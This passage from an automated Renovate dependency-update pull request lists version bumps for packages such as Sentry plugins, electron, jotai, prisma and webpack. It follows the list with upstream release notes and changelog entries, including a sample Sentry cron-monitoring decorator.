| [@sentry/esbuild-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.20.1` -> `2.21.1`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/2.20.1/2.21.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.15.0` -> `8.17.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.15.0/8.17.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@sentry/react](https://togithub.com/getsentry/sentry-javascript/tree/master/packages/react ) ([source](https://togithub.com/getsentry/sentry-javascript )) | [`8.15.0` -> `8.17.0`](https://renovatebot.com/diffs/npm/@sentry%2freact/8.15.0/8.17.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@sentry/webpack-plugin](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin ) ([source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins )) | [`2.20.1` -> `2.21.1`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/2.20.1/2.21.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@swc/core](https://swc.rs ) ([source](https://togithub.com/swc-project/swc )) | [`1.6.7` -> `1.6.13`](https://renovatebot.com/diffs/npm/@swc%2fcore/1.6.7/1.6.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/mixpanel-browser](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/mixpanel-browser ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/mixpanel-browser )) | [`2.49.0` -> `2.49.1`](https://renovatebot.com/diffs/npm/@types%2fmixpanel-browser/2.49.0/2.49.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/ws](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/ws ) ([source](https://togithub.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/ws )) | [`8.5.10` -> `8.5.11`](https://renovatebot.com/diffs/npm/@types%2fws/8.5.10/8.5.11 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://togithub.com/electron/electron ) | [`~30.1.0` -> `~30.2.0`](https://renovatebot.com/diffs/npm/electron/30.1.2/30.2.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [file-type](https://togithub.com/sindresorhus/file-type ) | [`19.1.0` -> `19.1.1`](https://renovatebot.com/diffs/npm/file-type/19.1.0/19.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [foxact](https://foxact.skk.moe ) ([source](https://togithub.com/SukkaW/foxact )) | [`0.2.35` -> `0.2.36`](https://renovatebot.com/diffs/npm/foxact/0.2.35/0.2.36 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [glob](https://togithub.com/isaacs/node-glob ) | [`10.4.3` -> `10.4.5`](https://renovatebot.com/diffs/npm/glob/10.4.3/10.4.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [i18next](https://www.i18next.com ) ([source](https://togithub.com/i18next/i18next )) | [`23.11.5` -> `23.12.1`](https://renovatebot.com/diffs/npm/i18next/23.11.5/23.12.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.8.4` -> `2.9.0`](https://renovatebot.com/diffs/npm/jotai/2.8.4/2.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.8.4` -> `2.9.0`](https://renovatebot.com/diffs/npm/jotai/2.8.4/2.9.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [jotai-scope](https://togithub.com/jotaijs/jotai-scope ) | [`^0.6.0` -> `^0.7.0`](https://renovatebot.com/diffs/npm/jotai-scope/0.6.0/0.7.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.400.0` -> `^0.408.0`](https://renovatebot.com/diffs/npm/lucide-react/0.400.0/0.408.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.5` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.4` -> `3.0.0-alpha.5` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.0` -> `20.15.1` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | patch |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.4.1` -> `19.4.3`](https://renovatebot.com/diffs/npm/nx/19.4.1/19.4.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [openai](https://togithub.com/openai/openai-node ) | [`4.52.3` -> `4.52.7`](https://renovatebot.com/diffs/npm/openai/4.52.3/4.52.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.1`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.45.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [prettier](https://prettier.io ) ([source](https://togithub.com/prettier/prettier )) | [`3.3.2` -> `3.3.3`](https://renovatebot.com/diffs/npm/prettier/3.3.2/3.3.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [prisma](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.16.1` -> `5.16.2`](https://renovatebot.com/diffs/npm/prisma/5.16.1/5.16.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-virtuoso](https://virtuoso.dev/ ) ([source](https://togithub.com/petyosi/react-virtuoso )) | [`4.7.11` -> `4.7.12`](https://renovatebot.com/diffs/npm/react-virtuoso/4.7.11/4.7.12 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [serde](https://serde.rs ) ([source](https://togithub.com/serde-rs/serde )) | `1.0.203` -> `1.0.204` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [storybook-dark-mode](https://togithub.com/hipstersmoothie/storybook-dark-mode ) | [`4.0.1` -> `4.0.2`](https://renovatebot.com/diffs/npm/storybook-dark-mode/4.0.1/4.0.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [tailwind-merge](https://togithub.com/dcastil/tailwind-merge ) | [`2.3.0` -> `2.4.0`](https://renovatebot.com/diffs/npm/tailwind-merge/2.3.0/2.4.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [typedoc](https://typedoc.org ) ([source](https://togithub.com/TypeStrong/TypeDoc )) | [`0.26.3` -> `0.26.4`](https://renovatebot.com/diffs/npm/typedoc/0.26.3/0.26.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [uuid](https://togithub.com/uuid-rs/uuid ) | `1.9.1` -> `1.10.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [vitest-fetch-mock](https://togithub.com/IanVS/vitest-fetch-mock ) | [`^0.2.2` -> `^0.3.0`](https://renovatebot.com/diffs/npm/vitest-fetch-mock/0.2.2/0.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [webpack](https://togithub.com/webpack/webpack ) | [`5.92.1` -> `5.93.0`](https://renovatebot.com/diffs/npm/webpack/5.92.1/5.93.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [wrangler](https://togithub.com/cloudflare/workers-sdk ) ([source](https://togithub.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.63.1` -> `3.64.0`](https://renovatebot.com/diffs/npm/wrangler/3.63.1/3.64.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
---
### Release Notes
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.614.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36140-2024-07-10 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.613.0...v3.614.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
### [`v3.613.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36130-2024-07-09 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.609.0...v3.613.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
</details>
<details>
<summary>fal-ai/fal-js (@​fal-ai/serverless-client)</summary>
### [`v0.13.0`](4ea43b4cea...cf300e9cc0 )
[Compare Source](4ea43b4cea...cf300e9cc0 )
</details>
<details>
<summary>GoogleCloudPlatform/opentelemetry-operations-js (@​google-cloud/opentelemetry-cloud-monitoring-exporter)</summary>
### [`v0.19.0`](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
[Compare Source](https://togithub.com/GoogleCloudPlatform/opentelemetry-operations-js/compare/@google-cloud/opentelemetry-cloud-monitoring-exporter@0.18.0...@google-cloud/opentelemetry-cloud-monitoring-exporter@0.19.0 )
</details>
<details>
<summary>marsidev/react-turnstile (@​marsidev/react-turnstile)</summary>
### [`v0.7.2`](https://togithub.com/marsidev/react-turnstile/releases/tag/v0.7.2 )
[Compare Source](https://togithub.com/marsidev/react-turnstile/compare/v0.7.1...v0.7.2 )
##### 🐞 Bug Fixes
- Resetting widgets solved ref back to false on widget unmount - by [@​kkatsi](https://togithub.com/kkatsi ) [<samp>(77f36)</samp>](https://togithub.com/marsidev/react-turnstile/commit/77f3686 )
##### [View changes on GitHub](https://togithub.com/marsidev/react-turnstile/compare/v0.7.1...v0.7.2 )
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.58`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.57...@napi-rs/cli@3.0.0-alpha.58 )
### [`v3.0.0-alpha.57`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.56...@napi-rs/cli@3.0.0-alpha.57 )
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.4.3`](https://togithub.com/nrwl/nx/releases/tag/19.4.3 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.2...19.4.3 )
#### 19.4.3 (2024-07-12)
##### 🚀 Features
- **core:** avoid forking process for nx:noop ([#​26869](https://togithub.com/nrwl/nx/pull/26869 ))
- **js:** add createNodesV2 for typescript plugin ([#​26788](https://togithub.com/nrwl/nx/pull/26788 ))
- **nx-dev:** add customers & company pages ([#​26813](https://togithub.com/nrwl/nx/pull/26813 ))
- **nx-dev:** Add more OSS logos ([#​26922](https://togithub.com/nrwl/nx/pull/26922 ))
##### 🩹 Fixes
- **core:** load isolated plugins in parallel ([#​26874](https://togithub.com/nrwl/nx/pull/26874 ))
- **core:** report should work if project graph errors ([#​26858](https://togithub.com/nrwl/nx/pull/26858 ))
- **misc:** properly set the value of the bitbucket option for ci work… ([#​26890](https://togithub.com/nrwl/nx/pull/26890 ))
- **misc:** add more ab testing for setting up ci and nx cloud ([#​26907](https://togithub.com/nrwl/nx/pull/26907 ))
- **vite:** Only attempt to amend test object if one exists ([#​26822](https://togithub.com/nrwl/nx/pull/26822 ))
- **vue:** bump vue-tsc version to 2.x.x ([#​26867](https://togithub.com/nrwl/nx/pull/26867 ))
##### ❤️ Thank You
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Jasper McCulloch
- Leosvel Pérez Espinosa [@​leosvelperez](https://togithub.com/leosvelperez )
- Nicholas Cunningham [@​ndcunningham](https://togithub.com/ndcunningham )
### [`v19.4.2`](https://togithub.com/nrwl/nx/releases/tag/19.4.2 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.4.1...19.4.2 )
#### 19.4.2 (2024-07-08)
##### 🚀 Features
- **core:** add support for wildcards in dependsOn ([#​19611](https://togithub.com/nrwl/nx/pull/19611 ))
- **linter:** support `eslint.config.cjs` and `*.cjs` extension with flat config ([#​26637](https://togithub.com/nrwl/nx/pull/26637 ))
##### 🩹 Fixes
- **core:** ensure better create nodes error messaging ([#​26811](https://togithub.com/nrwl/nx/pull/26811 ))
- **misc:** adjust nx cloud ab test ([#​26866](https://togithub.com/nrwl/nx/pull/26866 ))
##### ❤️ Thank You
- Ben Snyder
- Craigory Coppola [@​AgentEnder](https://togithub.com/AgentEnder )
- Jason Jean [@​FrozenPandaz](https://togithub.com/FrozenPandaz )
- Pavlo [@​fxposter](https://togithub.com/fxposter )
</details>
<details>
<summary>microsoft/playwright (@​playwright/test)</summary>
### [`v1.45.1`](https://togithub.com/microsoft/playwright/compare/v1.45.0...e8989f83d9801cdaadc3803b5341c601c9593947 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.45.0...v1.45.1 )
### [`v1.45.0`](https://togithub.com/microsoft/playwright/compare/v1.44.1...4f3f6eecae490af444dd9298c9eaeb0c596915b7 )
[Compare Source](https://togithub.com/microsoft/playwright/compare/v1.44.1...v1.45.0 )
</details>
<details>
<summary>prisma/prisma (@​prisma/client)</summary>
### [`v5.16.2`](https://togithub.com/prisma/prisma/releases/tag/5.16.2 )
[Compare Source](https://togithub.com/prisma/prisma/compare/5.16.1...5.16.2 )
Today, we are issuing the 5.16.2 patch release to fix an issue in Prisma client.
#### Fix in Prisma Client
- [nextjs app deployed to vercel edge can't import prisma WASM modul ](https://togithub.com/prisma/prisma/issues/24673 )
</details>
<details>
<summary>getsentry/sentry-javascript-bundler-plugins (@​sentry/esbuild-plugin)</summary>
### [`v2.21.1`](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#2211 )
[Compare Source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/compare/2.21.0...2.21.1 )
- fix: Do not delete files before all upload tasks executed ([#​572](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/issues/572 ))
Work in this release contributed by [@​tyouzu1](https://togithub.com/tyouzu1 ). Thank you for your contribution!
### [`v2.21.0`](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#2210 )
[Compare Source](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/compare/2.20.1...2.21.0 )
- fix: Use `sequential` and `post` order for vite artifact deletion ([#​568](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/issues/568 ))
- feat: Add option to disable sourcemaps ([#​561](https://togithub.com/getsentry/sentry-javascript-bundler-plugins/issues/561 ))
Work in this release contributed by [@​tyouzu1](https://togithub.com/tyouzu1 ). Thank you for your contribution!
</details>
<details>
<summary>getsentry/sentry-javascript (@​sentry/react)</summary>
### [`v8.17.0`](https://togithub.com/getsentry/sentry-javascript/blob/HEAD/CHANGELOG.md#8170 )
[Compare Source](https://togithub.com/getsentry/sentry-javascript/compare/8.16.0...8.17.0 )
- feat: Upgrade OTEL deps ([#​12809](https://togithub.com/getsentry/sentry-javascript/issues/12809 ))
- fix(nuxt): Add module to build:transpile script ([#​12843](https://togithub.com/getsentry/sentry-javascript/issues/12843 ))
- fix(browser): Allow SDK initialization in NW.js apps ([#​12846](https://togithub.com/getsentry/sentry-javascript/issues/12846 ))
### [`v8.16.0`](https://togithub.com/getsentry/sentry-javascript/blob/HEAD/CHANGELOG.md#8160 )
[Compare Source](https://togithub.com/getsentry/sentry-javascript/compare/8.15.0...8.16.0 )
##### Important Changes
- **feat(nextjs): Use spans generated by Next.js for App Router ([#​12729](https://togithub.com/getsentry/sentry-javascript/issues/12729 ))**
Previously, the `@sentry/nextjs` SDK automatically recorded spans in the form of transactions for each of your top-level
server components (pages, layouts, ...). This approach had a few drawbacks, the main ones being that traces didn't have
a root span, and more importantly, if you had data stream to the client, its duration was not captured because the
server component spans had finished before the data could finish streaming.
With this release, we will capture the duration of App Router requests in their entirety as a single transaction with
server component spans being descendants of that transaction. This means you will get more data that is also more
accurate. Note that this does not apply to the Edge runtime. For the Edge runtime, the SDK will emit transactions as it
has before.
Generally speaking, this change means that you will see less *transactions* and more *spans* in Sentry. You will no
longer receive server component transactions like `Page Server Component (/path/to/route)` (unless using the Edge
runtime), and you will instead receive transactions for your App Router SSR requests that look like
`GET /path/to/route`.
If you are on Sentry SaaS, this may have an effect on your quota consumption: Less transactions, more spans.
- **- feat(nestjs): Add nest cron monitoring support ([#​12781](https://togithub.com/getsentry/sentry-javascript/issues/12781 ))**
The `@sentry/nestjs` SDK now includes a `@SentryCron` decorator that can be used to augment the native NestJS `@Cron`
decorator to send check-ins to Sentry before and after each cron job run:
```typescript
import { Cron } from '@​nestjs/schedule';
import { SentryCron, MonitorConfig } from '@​sentry/nestjs';
import type { MonitorConfig } from '@​sentry/types';
const monitorConfig: MonitorConfig = {
schedule: {
type: 'crontab',
value: '* * * * *',
},
checkinMargin: 2, // In minutes. Optional.
maxRuntime: 10, // In minutes. Optional.
timezone: 'America/Los_Angeles', // Optional.
};
export class MyCronService {
@​Cron('* * * * *')
@​SentryCron('my-monitor-slug', monitorConfig)
handleCron() {
// Your cron job logic here
}
}
```
##### Other Changes
- feat(node): Allow to pass instrumentation config to `httpIntegration` ([#​12761](https://togithub.com/getsentry/sentry-javascript/issues/12761 ))
- feat(nuxt): Add server error hook ([#​12796](https://togithub.com/getsentry/sentry-javascript/issues/12796 ))
- feat(nuxt): Inject sentry config with Nuxt `addPluginTemplate` ([#​12760](https://togithub.com/getsentry/sentry-javascript/issues/12760 ))
- fix: Apply stack frame metadata before event processors ([#​12799](https://togithub.com/getsentry/sentry-javascript/issues/12799 ))
- fix(feedback): Add missing `h` import in `ScreenshotEditor` ([#​12784](https://togithub.com/getsentry/sentry-javascript/issues/12784 ))
- fix(node): Ensure `autoSessionTracking` is enabled by default ([#​12790](https://togithub.com/getsentry/sentry-javascript/issues/12790 ))
- ref(feedback): Let CropCorner inherit the existing h prop ([#​12814](https://togithub.com/getsentry/sentry-javascript/issues/12814 ))
- ref(otel): Ensure we never swallow args for ContextManager ([#​12798](https://togithub.com/getsentry/sentry-javascript/issues/12798 ))
</details>
<details>
<summary>swc-project/swc (@​swc/core)</summary>
### [`v1.6.13`](https://togithub.com/swc-project/swc/blob/HEAD/CHANGELOG.md#1613---2024-07-06 )
[Compare Source](https://togithub.com/swc-project/swc/compare/v1.6.12...v1.6.13 )
##### Bug Fixes
- **(es/parser)** Revert [#​9141](https://togithub.com/swc-project/swc/issues/9141 ) ([#​9171](https://togithub.com/swc-project/swc/issues/9171 )) ([8b66d5e](8b66d5e89b ))
- **(es/testing)** Fix `PluginCommentProxy` ([#​9170](https://togithub.com/swc-project/swc/issues/9170 )) ([d86ca2d](d86ca2d49e ))
##### Features
- **(es/typescript)** Improve fast TS strip ([#​9166](https://togithub.com/swc-project/swc/issues/9166 )) ([ee8dc28](ee8dc28d4d ))
- **(es/typescript)** Improve fast TS strip ([#​9167](https://togithub.com/swc-project/swc/issues/9167 )) ([98af589](98af5890da ))
##### Testing
- **(es/minfiier)** Improve comment testing ([#​9164](https://togithub.com/swc-project/swc/issues/9164 )) ([f90574d](f90574d045 ))
### [`v1.6.12`](https://togithub.com/swc-project/swc/blob/HEAD/CHANGELOG.md#1612---2024-07-06 )
[Compare Source](https://togithub.com/swc-project/swc/compare/v1.6.7...v1.6.12 )
##### Bug Fixes
- **(ci)** Restore disabled CI checks ([#​9002](https://togithub.com/swc-project/swc/issues/9002 )) ([cdfd4c8](cdfd4c85e4 ))
- **(es/decorators)** Fix bugs of `2022-03` implementation ([#​9145](https://togithub.com/swc-project/swc/issues/9145 )) ([8a3ae44](8a3ae44370 ))
- **(es/loader)** Exclude `.json` from default extension list ([#​9134](https://togithub.com/swc-project/swc/issues/9134 )) ([e94e5e7](e94e5e70c3 ))
- **(es/minifier)** Fix `undefined` judgement ([#​9146](https://togithub.com/swc-project/swc/issues/9146 )) ([1a739b7](1a739b7928 ))
- **(es/renamer)** Fix renaming of default-exported declarations ([#​9135](https://togithub.com/swc-project/swc/issues/9135 )) ([45f671d](45f671d8d8 ))
- **(es/renamer)** Remove `FastJsWord` ([#​9136](https://togithub.com/swc-project/swc/issues/9136 )) ([42b4caf](42b4caf573 ))
- **(es/typescript)** Fix tricky cases in TS fast strip ([#​9159](https://togithub.com/swc-project/swc/issues/9159 )) ([2bc51b8](2bc51b8ab2 ))
- **(es/typescript)** Fix replacement logic of fast TS strip ([#​9163](https://togithub.com/swc-project/swc/issues/9163 )) ([c5acafe](c5acafe386 ))
##### Features
- **(bindings/ts)** Add transform/strip-only mode ([#​9138](https://togithub.com/swc-project/swc/issues/9138 )) ([a08bb46](a08bb46ebd ))
- **(es/testing)** Improve comment testing story ([#​9150](https://togithub.com/swc-project/swc/issues/9150 )) ([3638e97](3638e97c80 ))
- **(es/typescript)** Add `swc_fast_ts_strip` ([#​9143](https://togithub.com/swc-project/swc/issues/9143 )) ([b129343](b129343c94 ))
- **(es/typescript)** Improve fast TS stripper ([#​9152](https://togithub.com/swc-project/swc/issues/9152 )) ([9fca4ab](9fca4ab555 ))
- **(es/typescript)** Improve fast TS stripper ([#​9153](https://togithub.com/swc-project/swc/issues/9153 )) ([732d748](732d748d4e ))
- **(es/typescript)** Improve fast TS strip ([#​9154](https://togithub.com/swc-project/swc/issues/9154 )) ([05c7210](05c721030a ))
##### Performance
- **(es)** Reduce allocations for dynamic stacks ([#​9133](https://togithub.com/swc-project/swc/issues/9133 )) ([648830a](648830a9a9 ))
##### Refactor
- **(bindings/ts)** Inline Wasm file into `wasm.js` ([#​9139](https://togithub.com/swc-project/swc/issues/9139 )) ([307b6f2](307b6f27a6 ))
- **(es/parser)** Improve readability ([#​9141](https://togithub.com/swc-project/swc/issues/9141 )) ([9d9fe66](9d9fe6625b ))
</details>
<details>
<summary>electron/electron (electron)</summary>
### [`v30.2.0`](https://togithub.com/electron/electron/releases/tag/v30.2.0 ): electron v30.2.0
[Compare Source](https://togithub.com/electron/electron/compare/v30.1.2...v30.2.0 )
##### Release Notes for v30.2.0
##### Features
- Enabled the Windows Control Overlay API on Linux. [#​42683](https://togithub.com/electron/electron/pull/42683 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42682 ), [32](https://togithub.com/electron/electron/pull/42681 ))</span>
- Expose `systemPreferences` to `utilityProcess`. [#​42600](https://togithub.com/electron/electron/pull/42600 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42598 ), [32](https://togithub.com/electron/electron/pull/42599 ))</span>
##### Fixes
- Fixed a focus issue when calling `BrowserWindow.setTopBrowserView`. [#​42735](https://togithub.com/electron/electron/pull/42735 ) <span style="font-size:small;">(Also in [31](https://togithub.com/electron/electron/pull/42734 ), [32](https://togithub.com/electron/electron/pull/42733 ))</span>
